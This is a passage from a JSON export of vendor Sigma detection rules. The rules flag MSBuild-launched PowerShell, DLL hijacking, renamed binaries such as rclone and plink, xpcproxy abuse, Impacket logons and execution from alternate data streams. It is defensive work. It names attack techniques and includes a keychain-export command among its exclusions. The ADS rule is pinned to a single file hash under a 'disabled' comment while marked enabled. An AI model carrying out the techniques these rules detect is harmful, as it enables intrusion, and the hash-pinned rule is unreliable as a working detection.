"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080151Z",
"creation_date": "2026-03-23T11:45:34.080153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080157Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/Mr-Un1k0d3r/PowerLessShell",
"https://attack.mitre.org/techniques/T1127/001/",
"https://attack.mitre.org/techniques/T1027/004/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1127_001_msbuild_powershell_execution.yml",
"content": "title: PowerShell Script Executed via MSBuild\nid: 5258ce45-d23f-411e-8ffe-675a220f6420\ndescription: |\n Detects a PowerShell script execution by the MSBuild process.\n Attackers often deliver PowerShell scripts as uncompiled code, and in order to hide the powershell.exe process, compile them directly on the victim's machine.\n This can be indicative of a PowerShell-less attack such as PowerLessShell or through frameworks such as Empire.\n It is recommended to analyze the executed PowerShell script for malicious content.\nreferences:\n - https://github.com/Mr-Un1k0d3r/PowerLessShell\n - https://attack.mitre.org/techniques/T1127/001/\n - https://attack.mitre.org/techniques/T1027/004/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2023/04/03\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1127.001\n - attack.t1027.004\n - attack.t1036\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.LOLBin.Msbuild\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'MSBuild.exe'\n condition: selection\nfalsepositives:\n - Legitimate developers including PowerShell scripts into their builds.\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5258ce45-d23f-411e-8ffe-675a220f6420",
"rule_name": "PowerShell Script Executed via MSBuild",
"rule_description": "Detects a PowerShell script execution by the MSBuild process.\nAttackers often deliver PowerShell scripts as uncompiled code, and in order to hide the powershell.exe process, compile them directly on the victim's machine.\nThis can be indicative of a PowerShell-less attack such as PowerLessShell or through frameworks such as Empire.\nIt is recommended to analyze the executed PowerShell script for malicious content.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027.004",
"attack.t1036",
"attack.t1059.001",
"attack.t1127.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "525b00f7-a2d5-466c-844d-35b6441c01c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082009Z",
"creation_date": "2026-03-23T11:45:34.082011Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082015Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dpapimig.yml",
"content": "title: DLL Hijacking via dpapimig.exe\nid: 525b00f7-a2d5-466c-844d-35b6441c01c7\ndescription: |\n Detects potential Windows DLL Hijacking via dpapimig.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dpapimig.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "525b00f7-a2d5-466c-844d-35b6441c01c7",
"rule_name": "DLL Hijacking via dpapimig.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dpapimig.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52676a08-8666-444d-83c4-cd0d831e19b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624967Z",
"creation_date": "2026-03-23T11:45:34.624969Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624974Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/003/"
],
"name": "t1036_003_renamed_suspicious_executables.yml",
"content": "title: Suspicious Renamed Binary Executed\nid: 52676a08-8666-444d-83c4-cd0d831e19b0\ndescription: |\n Detects the execution of a suspicious renamed binary.\n Attackers may rename legitimate Microsoft binaries to avoid detection.\n This rule detects incoherency between the name of the file being executed its PE original file name.\n Is it recommended to analyze the executed binary and search for signs of malicious content or behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1036/003/\ndate: 2020/12/22\nmodified: 2025/12/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1036.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_powershell:\n OriginalFileName: 'PowerShell.EXE'\n filter_powershell:\n Image|endswith: '\\powershell.exe'\n selection_cmd:\n OriginalFileName: 'Cmd.Exe'\n filter_cmd:\n Image|endswith: '\\cmd.exe'\n selection_mshta:\n OriginalFileName: 'MSHTA.EXE'\n filter_mshta:\n Image|endswith: '\\mshta.exe'\n selection_cscript:\n OriginalFileName: 'cscript.exe'\n filter_cscript:\n Image|endswith: '\\cscript.exe'\n selection_wscript:\n OriginalFileName: 'wscript.exe'\n filter_wscript:\n Image|endswith: '\\wscript.exe'\n selection_certutil:\n OriginalFileName: 'certutil.exe'\n filter_certutil:\n Image|endswith: '\\certutil.exe'\n selection_tzsync:\n OriginalFileName: 'tzsync.exe'\n filter_tzsync:\n Image|endswith: '\\tzsync.exe'\n selection_taskhost:\n OriginalFileName: 'taskhost.exe'\n filter_taskhost:\n Image|endswith: '\\taskhost.exe'\n selection_rundll:\n OriginalFileName: 'RUNDLL32.EXE'\n filter_rundll:\n Image|endswith: '\\rundll32.exe'\n selection_svchost:\n OriginalFileName: 'svchost.exe'\n filter_svchost:\n Image|endswith: '\\svchost.exe'\n selection_dllhost:\n 
OriginalFileName: 'dllhost.exe'\n filter_dllhost:\n Image|endswith: '\\dllhost.exe'\n selection_msiexec:\n OriginalFileName: 'msiexec.exe'\n filter_msiexec:\n Image|endswith: '\\msiexec.exe'\n selection_csrss:\n OriginalFileName: 'CSRSS.Exe'\n filter_csrss:\n Image|endswith: '\\csrss.exe'\n selection_winlogon:\n OriginalFileName: 'WINLOGON.EXE'\n filter_winlogon:\n - Image|endswith: '\\winlogon.exe'\n - InternalName: 'WinlogonGUILauncher.exe'\n selection_wininit:\n OriginalFileName: 'WinInit.EXE'\n filter_wininit:\n Image|endswith: '\\wininit.exe'\n selection_werfault:\n OriginalFileName: 'WerFault.EXE'\n filter_werfault:\n Image|endswith: '\\WerFault.exe'\n selection_schtasks:\n OriginalFileName:\n # Windows 7 variant with typo.\n - 'sctasks.exe'\n - 'schtasks.exe'\n filter_schtasks:\n Image|endswith: '\\schtasks.exe'\n selection_installutil:\n OriginalFileName: 'InstallUtil.exe'\n filter_installutil:\n Image|endswith: '\\InstallUtil.exe'\n selection_rclone:\n OriginalFileName: 'rclone.exe'\n filter_rclone:\n Image|endswith: '\\rclone.exe'\n selection_plink:\n OriginalFileName: 'Plink'\n filter_plink:\n Image|endswith: '\\plink.exe'\n selection_conhost:\n OriginalFileName: 'conhost.exe'\n filter_conhost:\n Image|endswith: '\\conhost.exe'\n selection_msbuild:\n OriginalFileName: 'MSBuild.exe'\n filter_msbuild:\n Image|endswith: '\\msbuild.exe'\n selection_utilman:\n OriginalFileName: 'utilman2.exe'\n filter_utilman:\n Image|endswith: '\\utilman.exe'\n selection_regsvr32:\n OriginalFileName: 'regsvr32.exe'\n filter_regsvr32:\n Image|endswith: '\\regsvr32.exe'\n\n exclusion_msiexec:\n - Image:\n - '?:\\Windows\\Installer\\MSI????.tmp'\n - '*\\Appdata\\Local\\Temp\\MSI????.tmp'\n ParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - Image|startswith:\n - '?:\\Windows\\Temp\\'\n - '?:\\Windows\\SystemTemp\\'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\'\n OriginalFileName: 'msiexec.exe'\n CommandLine|contains: ' /X 
{????????-????-????-????-????????????}'\n\n exclusion_pending_delete:\n # c:\\windows\\winsxs\\temp\\pendingdeletes\\$$deleteme.svchost.exe.01d84a7f1118b17d.0040\n Image: '?:\\windows\\winsxs\\temp\\pendingdeletes\\\\??deleteme.*.exe.*'\n\n exclusion_asus_svchost:\n # bf7c5a8346f03d923aac78f262dbf456f15810e990c4b5fee0010d81741f6029\n Image: '?:\\Windows\\SysWOW64\\AsHookDevice.exe'\n ProcessSignature: 'ASUSTeK Computer Inc.'\n\n exclusion_siemens:\n CommandLine: '?:\\Windows\\Installer\\MSI???.tmp /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\RemoveTBSAPP.bat'\n OriginalFileName: 'cmd.exe'\n\n exclusion_logmenim_plink:\n Image:\n - '?:\\Program Files\\LogMeNim\\LogMeNimSsh.exe'\n - '?:\\Program Files (x86)\\LogMeNim\\LogMeNimSsh.exe'\n ProcessSignature: 'ABTEL SARL'\n\n exclusion_systemcenter:\n ProcessImage: '?:\\program files\\common files\\microsoft system center *\\orchestrator\\extensions\\support\\ssh\\sshclient.exe'\n\n exclusion_total_security:\n ProcessParentImage: '?:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe'\n\n exclusion_agfa:\n ProcessParentImage|startswith: '?:\\Program Files (x86)\\Agfa\\'\n ProcessParentDescription: 'Qdoc France'\n ProcessParentCompany: 'Agfa'\n\n exclusion_avaya:\n ProcessImage: '?:\\Program Files (x86)\\Avaya\\CMS Supervisor *\\acs_ssh.exe'\n ProcessParentImage: '?:\\Program Files (x86)\\Avaya\\CMS Supervisor *\\acsCNTRL.exe'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Program Files\\Ab Initio\\Ab Initio GDE *\\Program Files\\ab_sshplink.exe'\n - '?:\\Program Files (x86)\\Ab Initio\\Ab Initio GDE *\\Program Files\\ab_sshplink.exe'\n - '?:\\Program Files (x86)\\ScriptLogic Corporation\\Security Explorer ?\\regsvr64.exe'\n - '?:\\Program Files (x86)\\Bignox\\BigNoxVM\\RT\\regsvr32_wow64.exe'\n - '?:\\Program Files\\Software Fix\\InstallUtil64.exe' # Lenovo\n - '?:\\Program Files (x86)\\T&D Recorder (*)\\regsvr.exe'\n - '?:\\Program 
Files\\iMC\\server\\bin\\plink??.exe'\n - '?:\\IMC\\server\\bin\\plink??.exe'\n\n condition: (\n (selection_powershell and not filter_powershell) or\n (selection_cmd and not filter_cmd) or\n (selection_mshta and not filter_mshta) or\n (selection_cscript and not filter_cscript) or\n (selection_wscript and not filter_wscript) or\n (selection_certutil and not filter_certutil) or\n (selection_tzsync and not filter_tzsync) or\n (selection_taskhost and not filter_taskhost) or\n (selection_rundll and not filter_rundll) or\n (selection_svchost and not filter_svchost) or\n (selection_dllhost and not filter_dllhost) or\n (selection_msiexec and not filter_msiexec) or\n (selection_csrss and not filter_csrss) or\n (selection_winlogon and not filter_winlogon) or\n (selection_wininit and not filter_wininit) or\n (selection_werfault and not filter_werfault) or\n (selection_schtasks and not filter_schtasks) or\n (selection_installutil and not filter_installutil) or\n (selection_rclone and not filter_rclone) or\n (selection_plink and not filter_plink) or\n (selection_conhost and not filter_conhost) or\n (selection_msbuild and not filter_msbuild) or\n (selection_regsvr32 and not filter_regsvr32) or\n (selection_utilman and not filter_utilman)\n ) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52676a08-8666-444d-83c4-cd0d831e19b0",
"rule_name": "Suspicious Renamed Binary Executed",
"rule_description": "Detects the execution of a suspicious renamed binary.\nAttackers may rename legitimate Microsoft binaries to avoid detection.\nThis rule detects a mismatch between the name of the file being executed and its PE original file name.\nIt is recommended to analyze the executed binary and search for signs of malicious content or behavior.\n",
"rule_creation_date": "2020-12-22",
"rule_modified_date": "2025-12-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1036.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "526f76da-f806-453c-a9f9-99a8a3dc4103",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598943Z",
"creation_date": "2026-03-23T11:45:34.598947Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598954Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-detection/detecting-cve-2015-1130-on-mac-os-x-endpoints/",
"https://attack.mitre.org/techniques/T1559/003/"
],
"name": "t1059_003_xpcproxy_spawn_process.yml",
"content": "title: Suspicious xpcproxy Execution\nid: 526f76da-f806-453c-a9f9-99a8a3dc4103\ndescription: |\n Detects the execution of the xpcproxy process under suspicious conditions, either by launching a new program or being initiated with an uncommon command-line argument.\n The xpcproxy utility is commonly used in macOS environments to facilitate communication between processes and can be abused to escalate privileges or execute commands with root access.\n Malicious use of xpcproxy may involve it launching unauthorized applications or scripts, or as an exploitation of CVE-2015-1130.\n It is recommended to investigate the program spawned or the actions made by xpcproxy to determine whether this action was legitimate.\nreferences:\n - https://redcanary.com/blog/threat-detection/detecting-cve-2015-1130-on-mac-os-x-endpoints/\n - https://attack.mitre.org/techniques/T1559/003/\ndate: 2024/06/26\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_image:\n - ParentImage: '/usr/libexec/xpcproxy'\n - CommandLine|startswith: 'xpcproxy /'\n\n # Filter-out missing parents\n selection_parent:\n ParentImage|contains: '?'\n\n exclusion_glpi:\n - ProcessImage: '/Applications/GLPI-Agent/bin/perl'\n - ProcessCommandLine:\n - \"sh -c exec security find-certificate -a -p > '/Applications/GLPI-Agent/var/keychain-export-*.pem' 2>/dev/null\"\n - 'security find-certificate -a -p'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "526f76da-f806-453c-a9f9-99a8a3dc4103",
"rule_name": "Suspicious xpcproxy Execution",
"rule_description": "Detects the execution of the xpcproxy process under suspicious conditions, either by launching a new program or being initiated with an uncommon command-line argument.\nThe xpcproxy utility is commonly used in macOS environments to facilitate communication between processes and can be abused to escalate privileges or execute commands with root access.\nMalicious use of xpcproxy may involve it launching unauthorized applications or scripts, or as an exploitation of CVE-2015-1130.\nIt is recommended to investigate the program spawned or the actions made by xpcproxy to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-26",
"rule_modified_date": "2025-10-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52762d00-7f7d-486e-85ae-511669cb63b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591475Z",
"creation_date": "2026-03-23T11:45:34.591479Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591487Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_uevappmonitor.yml",
"content": "title: DLL Hijacking via uevappmonitor.exe\nid: 52762d00-7f7d-486e-85ae-511669cb63b0\ndescription: |\n Detects potential Windows DLL Hijacking via uevappmonitor.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'uevappmonitor.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52762d00-7f7d-486e-85ae-511669cb63b0",
"rule_name": "DLL Hijacking via uevappmonitor.exe",
"rule_description": "Detects potential Windows DLL Hijacking via uevappmonitor.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52b4f9ce-946f-4f26-affb-866346adb5c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617892Z",
"creation_date": "2026-03-23T11:45:34.617894Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617898Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/software/S0357/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1078_impacket_authentication.yml",
"content": "title: Impacket NTLM Authentication with NULL Workstation Name Detected\nid: 52b4f9ce-946f-4f26-affb-866346adb5c0\ndescription: |\n Detects a Windows security event log event without a workstation name.\n These events are generated when connecting to a Windows workstation using a NULL workstation name.\n This can be the result of Impacket NTLM Authentication.\n Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols and is often used by attackers.\n It is recommended to investigate the related timeline, to see if other suspicious actions were taken around the time of this event.\nreferences:\n - https://attack.mitre.org/software/S0357/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2020/01/14\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.discovery\n - attack.t1078\n - attack.s0357\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection_ntlm:\n #LogonProcessName: 'NtLmSsp' # Investigating name differences between versions\n LogonProcessName: 'EXPERIMENTAL'\n AuthenticationPackageName: 'NTLM'\n LogonType: '3'\n\n selection_workstation:\n Workstation:\n - '-'\n - null\n WorkstationName:\n - '-'\n - null\n\n condition: all of selection_*\nlevel: low\n# level: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52b4f9ce-946f-4f26-affb-866346adb5c0",
"rule_name": "Impacket NTLM Authentication with NULL Workstation Name Detected",
"rule_description": "Detects a Windows Security event log entry without a workstation name.\nThese events are generated when a connection to a Windows workstation uses a NULL workstation name.\nThis can be the result of Impacket NTLM authentication.\nImpacket is an open-source collection of Python modules for programmatically constructing and manipulating network protocols, and is often used by attackers.\nIt is recommended to investigate the related timeline to see whether other suspicious actions were taken around the time of this event.\n",
"rule_creation_date": "2020-01-14",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52d5939f-ceeb-494e-a325-7fa2a6295e74",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087564Z",
"creation_date": "2026-03-23T11:45:34.087566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087571Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://owasp.org/www-community/attacks/Windows_alternate_data_stream",
"https://lolbas-project.github.io/lolbas/Binaries/Wmic/",
"https://attack.mitre.org/techniques/T1564/004/"
],
"name": "t1564_004_suspicious_execution_from_ads.yml",
"content": "title: Suspicious Process Execution from an ADS\nid: 52d5939f-ceeb-494e-a325-7fa2a6295e74\ndescription: |\n Detects a process execution from an Alternate Data Stream (ADS).\n Attackers can use ADS to hide malicious binaries to evade detection mechanisms.\n It is recommended to investigate the started process for malicious actions.\nreferences:\n - https://owasp.org/www-community/attacks/Windows_alternate_data_stream\n - https://lolbas-project.github.io/lolbas/Binaries/Wmic/\n - https://attack.mitre.org/techniques/T1564/004/\ndate: 2022/10/17\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessProcessName|contains: ':'\n # Rule temporarily disabled: the sha256 pin below restricts the selection to a single binary hash\n sha256: '68b36ebc5324a2732edf8121f09754a115e0adc5914eee22eb99f2ebfaeed376'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
